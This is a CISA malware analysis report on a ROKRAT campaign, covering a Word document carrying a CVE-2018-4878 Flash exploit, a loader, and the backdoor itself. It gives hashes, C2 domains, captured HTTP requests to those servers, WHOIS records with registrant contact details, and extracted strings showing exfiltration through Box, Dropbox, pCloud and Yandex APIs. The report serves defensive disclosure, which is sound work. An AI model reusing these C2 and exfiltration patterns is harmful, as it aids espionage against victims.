Malware Analysis Report (AR20-133D)

MAR-10160323-1.v2

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

The CISA Code & Media Analysis team received three artifacts for analysis. The first artifact is a malicious Microsoft Word document that contains an embedded Shockwave Flash (SWF) application file. This embedded SWF file attempts to exploit the vulnerability detailed within CVE-2018-4878. The second artifact executes an embedded resource named "JOK" and injects it into the Windows application "Wscript.exe." This embedded resource contains an encoded variant of the malware known as ROKRAT. The third artifact in this report is the embedded ROKRAT variant, which was extracted from the loader during analysis.

For a downloadable copy of IOCs, see MAR-10160323-1.v2.stix.

Submitted Files (5)

3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c (3f98c434d7b39de61a8b459180dd46...)

851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a (aa525af1589156fc09f78e69b3b034...)

e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd (d2881e56e66aeaebef7efaa60a58ef...)

e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573 (5c6c1ed910e7c9740a0289a6d27890...)

fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0 (111d205422fe90848c2f41cc84ebd9...)

Domains (2)

www.1588-2040.co.kr

www.korea-tax.info

Findings

3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c

Tags

CVE-2018-4878, trojan

Details
Name 3f98c434d7b39de61a8b459180dd46a3
Size 121344 bytes
Type Composite Document File V2 Document, Cannot read section info
MD5 3f98c434d7b39de61a8b459180dd46a3
SHA1 1584b3ce64835a3c7b796139fbd981a9f2cddb6c
SHA256 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
SHA512 27643afc00fda2dd8b447af1e6950d65fe5b4dd91a8eb022fef68694126efe41fd8895a6c065c261507bb526668c27f4bc055ac58c592d43cf760c32e365be2d
ssdeep 1536:+dVr1FoOLJEd4EQA9mVOkxN7ORzh9n98scLzA4QfwnEOCnnvlQXRhuA+0qwvxH9n:u1FLNEfBj2NSRvZQnEDtShuA3H9yW
Entropy 7.947501
Antivirus
Ahnlab SWF/Agent
Antiy Trojan[Exploit]/SWF.CVE-2018-4878
Avira EXP/CVE-2018-4878.A.Gen
BitDefender Exploit.Agent.MS
ClamAV Swf.Trojan.Rokrat-6443186-0
Cyren Siwifi
ESET SWF/Exploit.CVE-2018-4878.A trojan
Emsisoft Exploit.Agent.MS (B)
Ikarus Trojan.SWF.Exploit
McAfee RDN/Generic Exploit.lv
Microsoft Security Essentials Exploit:SWF/Korpode.A
NetGate Exploit.Win32.Generic
Quick Heal Exp.OLE.CVE-2018-4878.C
Sophos Troj/SwfExp-OI
Symantec Trojan.Gen.NPE.2
TACHYON Trojan-Exploit/W97.Agent.Gen
TrendMicro TROJ_EX.F2A7C559
TrendMicro House Call TROJ_EX.F2A7C559
YARA Rules

No matches found.

ssdeep Matches
97 6280a646ded60de151e1c8ad25f7756e2254f6cb5a7720e704589d692898f8e1
97 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
97 e3247251d459a89493a1494052ad11d8f8c2fd911acd7eedd5bfd78b6bd34c87
Relationships
3b1395f620... Contains 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
Description

This file is a malicious Microsoft Word document. This document contains an embedded malicious Shockwave Flash (SWF) file (851b7b044c...) designed to exploit the vulnerability detailed within CVE-2018-4878.

851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a

Tags

CVE-2018-4878, trojan

Details
Name aa525af1589156fc09f78e69b3b03428
Size 117864 bytes
Type Macromedia Flash data, version 32
MD5 aa525af1589156fc09f78e69b3b03428
SHA1 6ff889358923ab2a0de80303be9ac559a555b9b9
SHA256 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
SHA512 3a82f830bcf547c94a3b0e56ffa27330328b392a4d1356f7e62a28c18d2eb110507968a3f66e51e985ffceb3640885e5402623cf9ab987ae7a005cff2b1edd57
ssdeep 1536:4dVr1FoOLJEd4EQA9mVOkxN7ORzh9n98scLzA4QfwnEOCnnvlQXRhuA+0qwvxH9S:41FLNEfBj2NSRvZQnEDtShuA3H9yf
Entropy 7.987027
Antivirus
Ahnlab SWF/Cve-2018-4878.R.SS18
Avira EXP/CVE-2018-4878.A.Gen
BitDefender Exploit.Agent.MS
ClamAV Win.Trojan.Agent-6551186-0
Cyren SWF/CVE-2018-4878.B!Camelot
ESET SWF/Exploit.CVE-2018-4878.A trojan
Emsisoft Exploit.Agent.MS (B)
Ikarus Trojan.SWF.Exploit
McAfee Exploit-CVE2018-4878.b
Microsoft Security Essentials Exploit:SWF/Korpode.A!gen
Quick Heal Exp.SWF.CVE-2018-4878.D
Sophos Troj/SwfExp-OK
Symantec Trojan.Gen.NPE.2
TACHYON Trojan-Exploit/SWF.Agent.Gen
YARA Rules

No matches found.

ssdeep Matches
97 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
99 6280a646ded60de151e1c8ad25f7756e2254f6cb5a7720e704589d692898f8e1
97 e3247251d459a89493a1494052ad11d8f8c2fd911acd7eedd5bfd78b6bd34c87
Relationships
851b7b044c... Contained_Within 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
851b7b044c... Connected_To www.korea-tax.info
Description

This file is the malicious Shockwave Flash (SWF) file embedded in the Microsoft Word document 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c. When the malware is executed, it attempts to connect to the hard-coded command-and-control (C2) server "www.korea-tax.info."

www.korea-tax.info

Tags

command-and-control

URLs
  • www.korea-tax.info/crossdomain.xml
  • www.korea-tax.info/main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207
Ports
  • 80 TCP
HTTP Sessions
  • GET /crossdomain.xml HTTP/1.1
    Host: www.korea-tax.info
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
    Accept: */*
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
  • GET /main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207 HTTP/1.1
    Host: www.korea-tax.info
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
    Accept: */*
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
Whois

Queried whois.afilias.info with "korea-tax.info"...

Domain Name: KOREA-TAX.INFO
Registry Domain ID: D503300000055962553-LRMS
Registrar WHOIS Server:
Registrar URL: http://www.PublicDomainRegistry.com
Updated Date: 2018-02-10T20:31:57Z
Creation Date: 2017-12-12T05:52:58Z
Registry Expiry Date: 2018-12-12T05:52:58Z
Registrar Registration Expiration Date:
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
Registrar Abuse Contact Phone: +1.2013775952
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: C213778924-LRMS
Registrant Name: yang jieun
Registrant Organization: yang jieun
Registrant Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Registrant City: Kwangmyong
Registrant State/Province: Kyonggi-do
Registrant Postal Code: 14200
Registrant Country: KR
Registrant Phone: +82.1044612320
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: john.chapman91128@gmail.com
Registry Admin ID: C213778924-LRMS
Admin Name: yang jieun
Admin Organization: yang jieun
Admin Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Admin City: Kwangmyong
Admin State/Province: Kyonggi-do
Admin Postal Code: 14200
Admin Country: KR
Admin Phone: +82.1044612320
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: john.chapman91128@gmail.com
Registry Tech ID: C213778924-LRMS
Tech Name: yang jieun
Tech Organization: yang jieun
Tech Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Tech City: Kwangmyong
Tech State/Province: Kyonggi-do
Tech Postal Code: 14200
Tech Country: KR
Tech Phone: +82.1044612320
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: john.chapman91128@gmail.com
Registry Billing ID: C213778924-LRMS
Billing Name: yang jieun
Billing Organization: yang jieun
Billing Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Billing City: Kwangmyong
Billing State/Province: Kyonggi-do
Billing Postal Code: 14200
Billing Country: KR
Billing Phone: +82.1044612320
Billing Phone Ext:
Billing Fax:
Billing Fax Ext:
Billing Email: john.chapman91128@gmail.com
Name Server: NS3.HOSTINGER.COM
Name Server: NS4.HOSTINGER.COM
Name Server: NS1.HOSTINGER.COM
Name Server: NS2.HOSTINGER.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

Relationships
www.korea-tax.info Connected_From 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
Description

Identified malicious C2 Server.

fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0

Tags

CVE-2018-4878, trojan

Details
Name 111d205422fe90848c2f41cc84ebd96a
Size 117338 bytes
Type Macromedia Flash data, version 32
MD5 111d205422fe90848c2f41cc84ebd96a
SHA1 b03f6f336c07d514edb15d6e3fefd98432cae7e2
SHA256 fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
SHA512 a8e7db77fd6f27ae8ca18be8ed644df3443d17b048fc6baf1b7496da2810b014e19a35e9502de252ad65cf4feb07ccba53aeb567ad62d897231c1a3b17d619b5
ssdeep 3072:BebZ1dssmUo7VUthHkNEVVKJ6ydYBpb2N4r1Je:sbZfssAGoQymsgM
Entropy 7.983610
Antivirus
Ahnlab SWF/Cve-2018-4878.R.SS18
Antiy Trojan[Exploit]/SWF.CVE-2018-4878
Avira EXP/CVE-2018-4878.A.Gen
BitDefender Script.SWF.C589
ClamAV Swf.Trojan.Rokrat-6443186-0
Cyren SWF/CVE-2018-4878.B!Camelot
ESET SWF/Exploit.CVE-2018-4878.A trojan
Emsisoft Script.SWF.C589 (B)
Ikarus Trojan.SWF.Exploit
McAfee Exploit-CVE2018-4878.b
Microsoft Security Essentials Exploit:SWF/Korpode.A!gen
NANOAV Exploit.Swf.CVE20184878.exmycd
Quick Heal Exp.SWF.CVE-2018-4878.D
Sophos Troj/SWFExp-OL
Symantec Trojan.Gen.2
TACHYON Trojan-Exploit/SWF.Agent.Gen
TrendMicro SWF_EXP.3A46FD51
TrendMicro House Call SWF_EXP.3A46FD51
YARA Rules

No matches found.

ssdeep Matches
99 3004196da6055c6f062c94a9aae8dc357fa19b953b071049083e69e840083cf9
Relationships
fec71b8479... Connected_To www.1588-2040.co.kr
Description

This file is a malicious Shockwave Flash (SWF) file designed to exploit the vulnerability detailed within CVE-2018-4878. When executed, the malware attempts to connect to the hard-coded command-and-control (C2) server "www.1588-2040.co.kr."

www.1588-2040.co.kr

Tags

command-and-control

URLs
  • www.1588-2040.co.kr/crossdomain.xml
  • www.1588-2040.co.kr/design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207
Ports
  • 80 TCP
HTTP Sessions
  • GET /crossdomain.xml HTTP/1.1
    Host: www.1588-2040.co.kr
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
    Accept: */*
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
  • GET /design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207 HTTP/1.1
    Host: www.1588-2040.co.kr
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
    Accept: */*
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
Whois

Domain Name                 : 1588-2040.co.kr
Registrant                 : S.S. Moon
Registrant Address         : 1303 manhatan b/d 36-2, Yeoeuido-dong Yeongdeungpo-gu Seoul Korea
Registrant Zip Code         : 150749
Administrative Contact(AC) : S.S. Moon
AC E-Mail                 : card15882040@nate.com
AC Phone Number             : 02-2090-3500
Registered Date             : 2009. 07. 03.
Last Updated Date         : 2015. 07. 03.
Expiration Date             : 2018. 07. 03.
Publishes                 : Y
Authorized Agency         : Asadal, Inc.(http://www.asadal.co.kr)
DNSSEC                     : unsigned

Primary Name Server
Host Name                : ns.epart.com

Secondary Name Server
Host Name                : ns1.epart.com

Relationships
www.1588-2040.co.kr Connected_From fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
Description

Identified malicious C2 domain.

e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd

Tags

backdoor, dropper, trojan

Details
Name d2881e56e66aeaebef7efaa60a58ef9b
Size 626688 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 d2881e56e66aeaebef7efaa60a58ef9b
SHA1 c09c1be69e5a206bcfe3d726773f0b0ddecb3622
SHA256 e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd
SHA512 da6e40bcebc6161386142caa6c1e68faf7f520cc48cbb514d8029d65f9bb0cac14bde435eb584a998be9e379cc875b85719cc0d4ee9d0fed73b5c20cf7da7fe8
ssdeep 12288:cbeQy0+6dUlyAcdqfAkMvGpns9gKYLd+NjhzZkZf7:AfuJGv2ns9XRkZf
Entropy 7.866467
Antivirus
Ahnlab Trojan/Win32.Loader
Antiy Trojan/Win32.RockRat
Avira TR/Dropper.Gen
BitDefender Trojan.GenericKD.41796224
ClamAV Win.Trojan.Rokrat-6443187-0
Cyren W32/Trojan.IKOU-3732
ESET Win32/Spy.Agent.PHF trojan
Emsisoft Trojan.GenericKD.41796224 (B)
Filseclab Trojan.RockRat.gen.qzrl
Ikarus Trojan.Win32.Krypt
K7 Trojan ( 00525b861 )
McAfee Trojan-FPCM!D2881E56E66A
Microsoft Security Essentials Trojan:Win32/Korpode.A!dha
NANOAV Trojan.Win32.RockRat.exmijf
NetGate Trojan.Win32.Malware
Quick Heal Trojan.RockRat.S1875120
Sophos Mal/FakeAV-ST
Symantec Backdoor.Rokrat
Systweak trojan.korpode
TrendMicro Backdoo.3FA9A8A6
TrendMicro House Call Backdoo.3FA9A8A6
Vir.IT eXplorer Trojan.Win32.Spy.AST
VirusBlokAda Malware-Cryptor.Inject.gen
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
e1546323dc... Contains e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573
Description

This file is a loader. It is designed to load and execute data contained within an embedded resource named "JOK" into the Windows application "Wscript.exe." The embedded "JOK" resource is approximately 522,848 bytes in size and contains executable code. The beginning portion of the data reveals the presence of a NOP sled (0x90, 0x90, 0x90, ...), which leads to a decoder stub. The decoder code decodes the embedded executable code within the Windows "Wscript.exe" process. The embedded executable code has been identified as ROKRAT (e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573).


Screenshots

Figure 1 -

e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573

Tags

spyware, trojan

Details
Name 5c6c1ed910e7c9740a0289a6d278908a
Size 520704 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 5c6c1ed910e7c9740a0289a6d278908a
SHA1 0e46e026890982da526d8acf9f1ce6287451c9a6
SHA256 e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573
SHA512 e2d3059e28998bfb5c0badf3d6d8df28e527037c33b489b7dcc2f392a1d91a568beef410a4feaabc4daee98112142e58394ed5e2a73c71ed0cb46943eb3383d1
ssdeep 6144:Wh65XKGJs5Ve5psLyYuwAKdf9Q4p9FCAkko7cmxBZAk4+AJ6P3VNUo+wABK7Cl/5:SAKdf+4p9J2x0k4+AQ3VNH+rZx7Aq9
Entropy 6.560851
Antivirus
Ahnlab Trojan/Win32.Hwdoor
Antiy Trojan[Spy]/Win32.Agent
Avira HEUR/AGEN.1133065
BitDefender Gen:Variant.Graftor.538484
ClamAV Win.Trojan.Rokrat-6380697-0
ESET a variant of Win32/Spy.Agent.PHF trojan
Emsisoft Gen:Variant.Graftor.538484 (B)
Ikarus Trojan-Spy.Agent
K7 Spyware ( 0051fbf81 )
Microsoft Security Essentials Trojan:Win32/Korpode.A!dha
NANOAV Trojan.Win32.Generic.evuabe
NetGate Trojan.Win32.Malware
Sophos Troj/Spy-AQO
Symantec Trojan.Gen.2
Systweak malware.gen-rg
TACHYON Trojan-Spy/W32.Agent.520704.E
TrendMicro TSPY_KO.89D03B8E
TrendMicro House Call TSPY_KO.89D03B8E
Vir.IT eXplorer Trojan.Win32.Spy.BUB
VirusBlokAda TrojanSpy.Agent
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
e200517ab9... Contained_Within e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd
Description

This file has been identified as a variant of the malware known as ROKRAT and was obtained by extracting it from the file e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd.

Displayed below are strings of interest extracted from this variant of ROKRAT.

--Begin Strings of Interest--
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
access_token
authorization_code
bearer
client_id
client_secret
code
expires_in
grant_type
redirect_uri
refresh_token
response_type
scope
state
token
token_type
access_token
authorization_code
bearer
client_id
client_secret
code
expires_in
grant_type
redirect_uri
refresh_token
response_type
scope
state
token
token_type
Accept
Accept-Charset
Accept-Encoding
Accept-Language
Accept-Ranges
Age
Allow
Authorization
Cache-Control
Connection
Content-Encoding
Content-Language
Content-Length
Content-Location
Content-MD5
Content-Range
Content-Type
Content-Disposition
Date
ETag
Expect
Expires
From
Host
If-Match
If-Modified-Since
If-None-Match
If-Range
If-Unmodified-Since
Last-Modified
Location
Max-Forwards
Pragma
Proxy-Authenticate
Proxy-Authorization
Range
Referer
Retry-After
Server
Trailer
Transfer-Encoding
Upgrade
User-Agent
Vary
Via
Warning
WWW-Authenticate
Cookie
Set-Cookie
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
en-US,en;q=0.8
Bearer
http://127.0.0.1/
https://api.box.com/oauth2/token
https://account.box.com/api/oauth2/authorize
https://api.box.com/2.0/folders/%s/items
GET
entries
etag
name
sequence_id
type
folder
file
POST
201
409
DELETE
204
https://api.box.com/2.0/files/%s/content
200
https://api.box.com/2.0/files/%s
https://api.box.com/2.0/files/%s/trash
https://upload.box.com/api/2.0/files/content
--opxer--
Content-Disposition: form-data; name="attributes"
"}}
", "parent":{"id":"
{"name":"
Content-Disposition: form-data; name="file"; filename="
Content-Type: video/dat
multipart/form-data;boundary=--opxer--
error
sha1
description
created_at
modified_at
size
https://api.box.com/2.0/folders/%s
Error
var request_token = '
max-age=0
<input type="hidden" name="ic" value="
<input type="hidden" name="state" value="
<form action="
box_visitor_id=
bv=
cn=
site_preference=
302
vector<T> too long
invalid string position
string too long
Aapplication/json
path
https://api.dropboxapi.com/2/files/delete
https://content.dropboxapi.com/2/files/upload
application/octet-stream
{"path":"%s","mode":{".tag":"overwrite"}}
{"path":"%s"}
Dropbox-API-Arg
https://content.dropboxapi.com/2/files/download
Ahttps://api.pcloud.com/oauth2_token
https://my.pcloud.com/oauth2/authorize
https://api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1
--wwjaughalvncjwiajs--
Content-Type: voice/mp3
multipart/form-data;boundary=--wwjaughalvncjwiajs--
fileids
https://api.pcloud.com/getfilelink?path=%s&forcedownload=1&skipfilename=1
hosts
https://%s%s
https://api.pcloud.com/deletefile?path=%s
true
%s/%s
OAuth
PUT
href
https://cloud-api.yandex.net/v1/disk/resources?path=%s&permanently=%s
false
202
https://cloud-api.yandex.net/v1/disk/resources/upload?path=%s&overwrite=%s
method
https://cloud-api.yandex.net/v1/disk/resources/download?path=%s
--End Strings of Interest--

Relationship Summary

3b1395f620... Contains 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
851b7b044c... Contained_Within 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
851b7b044c... Connected_To www.korea-tax.info
www.korea-tax.info Connected_From 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
fec71b8479... Connected_To www.1588-2040.co.kr
www.1588-2040.co.kr Connected_From fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
e1546323dc... Contains e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573
e200517ab9... Contained_Within e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.us-cert.gov.

Revisions

May 12, 2020: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.
